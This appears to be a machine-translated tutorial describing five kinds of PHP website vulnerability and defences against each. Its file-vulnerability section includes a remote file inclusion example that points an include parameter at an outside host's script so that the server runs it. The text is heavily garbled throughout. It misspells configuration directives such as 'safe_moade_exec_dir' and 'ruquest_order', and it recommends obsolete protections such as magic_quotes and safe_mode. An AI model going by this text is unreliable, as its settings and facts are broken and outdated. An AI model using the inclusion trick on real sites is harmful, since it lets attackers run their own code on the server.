Common security vulnerabilities and defense methods of PHP websites
Currently, PHP-based website development has become the mainstream of website development. This article focuses on exploring PHP website attacks and security prevention to reduce website vulnerabilities and hope to help you!
I. Common PHP Website Security Vulnerabilities
There are currently five common PHP vulnerabilities. Session file vulnerabilities, SQL Injection Vulnerabilities, script command execution vulnerabilities, global variables vulnerabilities, and file vulnerabilities. These vulnerabilities are briefly described here.
1. session File Vulnerability
Session attacks are one of the most common attack methods for hackers. When a user accesses a website, the Session and Cookie are set for PHP to facilitate user use and access, in order to avoid losing the account and password for each page of the user.
2. SQL Injection Vulnerability
During website development, the programmer lacks comprehensive judgment on user data or does not strictly filter the data, causing the server to execute malicious information, such as user information query. Hackers can obtain relevant information based on the results returned by malicious programs. This is the SQL injection vulnerability in the monthly stomach.
3. Script Execution Vulnerability
The common cause of the script execution vulnerability is that the programmer rarely filters URL parameters submitted by users during website development. The URLs submitted by users may contain malicious code and cause cross-site scripting attacks. Script Execution Vulnerabilities often exist on previous PHP websites. However, with the upgrade of the PHP version, these questions have been reduced or do not exist.
4. global variable Vulnerability
Variables in PHP do not need to be declared in advance when they are used as in other development languages. Variables in PHP can be directly used without being declared and automatically created when used, you do not need to describe the variable type. The system automatically determines the variable type based on the context. This method can greatly reduce the probability of errors in programming, which is very convenient to use.
5. File Vulnerabilities
File vulnerabilities are usually caused by a lack of adequate filtering of external data during website design by website developers. As a result, hackers exploit the vulnerabilities to execute relevant commands on the Web process. Assume that. php contains the following code: include ($ B. "/aaa. php ".), for hackers, the variable $ B can be used to launch remote attacks. It can be the hacker's own code to launch attacks on the website. You can submit a. php include = http: // lz7.0.0.0.1/B. php to the server, and then execute the B. php Command.
Ii. Prevention Measures for common PHP Vulnerabilities
1. Session vulnerability prevention
According to the previous analysis, Session hijacking is the most common attack type, that is, the hacker obtains the user's Session ID through various attack methods, then, use the identity of the attacked user to log on to the corresponding website. To prevent this problem, you can use the following methods: first, change the Session ID periodically. You can use the PHP built-in function to change the Session ID. Second, change the Session name, in general, the default Session name is PHPSESSID. This variable is generally saved in cookies. If you change the name, you can block some hacker attacks; the third is to close the transparent Session ID. The so-called transparent means that Sessioin id is transmitted by link when the http request does not use cookies to specify the Session id. to disable transparent Session ID, you can operate PHP. the INI file is implemented. The fourth is to pass the hidden parameters through the URL. This ensures that even if the hacker obtains the session data, the Session ID variable value is hard to be obtained because the relevant parameters are hidden.
2. Prevention of SQL Injection Vulnerabilities
Hackers have many SQL injection methods and are flexible and changeable. However, the common cause of SQL injection is the use of the input Filter Vulnerability. Therefore, to fundamentally prevent SQL injection, the fundamental solution is to filter out request commands, especially query request commands. Specifically, it includes the following: First, filter statements are parameterized, that is, user information input is achieved through parameterized statements rather than directly embedding user input into statements. Second, use as few explanatory programs as possible during website development. Hackers often use this method to execute illegal commands. Third, avoid website bugs as much as possible during website development, otherwise, hackers may exploit this information to attack the website. It is not enough to defend against SQL Injection alone. In addition, they often use professional vulnerability scanning tools to scan the website for vulnerabilities.
3. Script Execution Vulnerability prevention
Attackers can exploit the scripting vulnerability to launch attacks in a variety of ways, which are flexible and changeable. Therefore, they must adopt a variety of preventive methods, in order to effectively prevent hackers from attacking the Script Execution Vulnerability. The following methods are commonly used. First, set the path of the executable file in advance. It can be implemented through safe_moade_exec_dir. The second is to process the command parameters, which is generally implemented using the escapeshellarg function. The third is to use the built-in function library to replace external commands; fourth, the use of external commands may be reduced during operations.
4. global variable vulnerability prevention
For the global variable vulnerability in PHP, this problem exists in the previous PHP version. However, after the PHP version is upgraded to 5.5. set ruquest_order to GPC. In addition, in the php. ini configuration file, you can set the Boolean value of Magic_quotes_runtime to determine whether to add a backslash to the overflow character in the externally appealing data. In order to ensure that the website program can run in any setting status on the server. You can use get_magic_quotes_runtime at the beginning of the entire program to check the setting status to determine whether to manually handle the problem, or use set_magic_quotes_runtime (0) to disable it at the beginning (or when automatic escape is not required.
5. File Vulnerability prevention
For PHP file leakage, you can set and configure the server for defense purposes. The specific operation here is as follows: first, disable the error prompt in the PHP code, so that hackers can avoid getting the database information and the physical path of the webpage file through the error prompt; second, do your best to set open_basedir, that is, operations on files outside the directory are prohibited; this can protect local files or remote files to prevent them from being attacked, pay attention to the prevention of attacks on Session files and uploaded files. The third is to set safe-made to the Enabled state to standardize the commands to be executed and prohibit file upload, it can effectively improve the security factor of PHP websites.